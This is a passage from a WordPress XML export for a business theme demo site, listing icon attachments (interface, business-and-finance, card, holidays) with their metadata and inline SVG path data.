"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>interface</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/interface/</link>
		<pubDate>Wed, 09 Sep 2020 07:02:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/interface.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>629</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:02:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:02:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[interface]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/interface.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/interface.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/business-and-finance/</link>
		<pubDate>Wed, 09 Sep 2020 07:06:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>631</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:06:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:06:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/business-and-finance-1/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>637</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>card</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/card/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/card.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>638</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[card]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/card.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/card.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>holidays</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/holidays/</link>
		<pubDate>Wed, 09 Sep 2020 07:33:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/holidays.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>643</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:33:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:33:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[holidays]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/holidays.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/holidays.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 